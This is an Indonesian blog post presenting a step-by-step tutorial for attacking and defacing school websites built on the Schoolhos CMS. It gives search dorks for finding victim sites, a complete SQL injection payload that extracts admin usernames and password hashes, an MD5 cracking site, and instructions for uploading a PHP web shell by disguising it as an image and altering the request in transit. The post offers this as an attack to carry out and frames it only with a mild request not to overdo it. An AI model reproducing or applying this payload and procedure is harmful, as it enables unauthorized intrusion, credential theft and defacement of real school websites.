Lagi lagi CMS yang banyak di gunakan website sekolah memiliki BUG, setelah Balitbang, Popoji CMS.. Nanti apa lagi yah ?? Kali ini bukan tentang Baltibang atau Popoji CMS melainkan "Schoolhos CMS" mungkin CMS ini belum sempurna makanya masih memiliki BUG yang Cukup beresiko !! simak langsung aja tutorial "Deface SQLi Schoolhos CMS"
Bahan-bahan :
1. Dork :
# inurl:"/?p=info" site:id
# inurl:"/?p=detberita"
# inurl:"/?p=guru" site:id
kembangkan lagi dengan otak hentai kalian :v
2. SQL Injection (Exploit SQL)
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
3. MD5 Hash Decrypter :https://hashkiller.co.uk/
Step by Step :
1. Dorking di gugel (jangan dorking gambar coeg)
2. Pilih target kamu
3. Masukan Exploit (SQL Injection) contoh : http://targetkamu.domain/?p=detberita&id=5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
4. Kalo vuln akan muncul username dan password nya.
Note : itukan setelah admin ada angka-angka contoh : admin20160407 nah si angka 20160407 abaikan aja.
5. Copy MD5 Hash tadi, lalu kamu buka MD5 Decrypter tadi. kamu masukan di situ. hash yang tadi.
6. Setelah selesai di hash kamu login ke panel admin. lokasinya : http://targetkamu.domain/adminpanel/
7. Masukan username dan password yang kamu dapat tadi..
8. Lanjut !! mau tanam shell ?? kamu tinggal ke menu Berita, Informasi, Album Galeri.
9. Rename dlu shell kamu dari shell.php jadi shell.php.jpg
10. Setelah itu pilih shell kamu lalu gunakan tamper data..
11. Ganti nama shell kamu dari shell.php.jpg jadi shell.php (ganti pas di tamper datanya)
Note : tanam shell dan akses shell nya sama kaya Lokomedia kok.
Warning ! : Karena yang menggunakan CMS ini adalah web sekolah.. saya mohon jangan terlalu berlebihan mengexploitnya. Dan jangan juga tebas index malu om sama total archive defacean kamu.
Apalagi bawa-bawa nama Indonesia dan blabla. Pengen tenar ?? kaga usah show off defacean web sekolah.. kalo gw liat sih bakal gw ketawain.
2 komentar
komentarlu sendiri copas kaga pake sumber coy
ReplyKok gak eror pas admin panel
ReplyBERKOMENTAR lah dengan kata kata yg baik.
Hargai post orang. :)
Boleh copas asal ksi Sumber ya..
Hargai karya kami. :)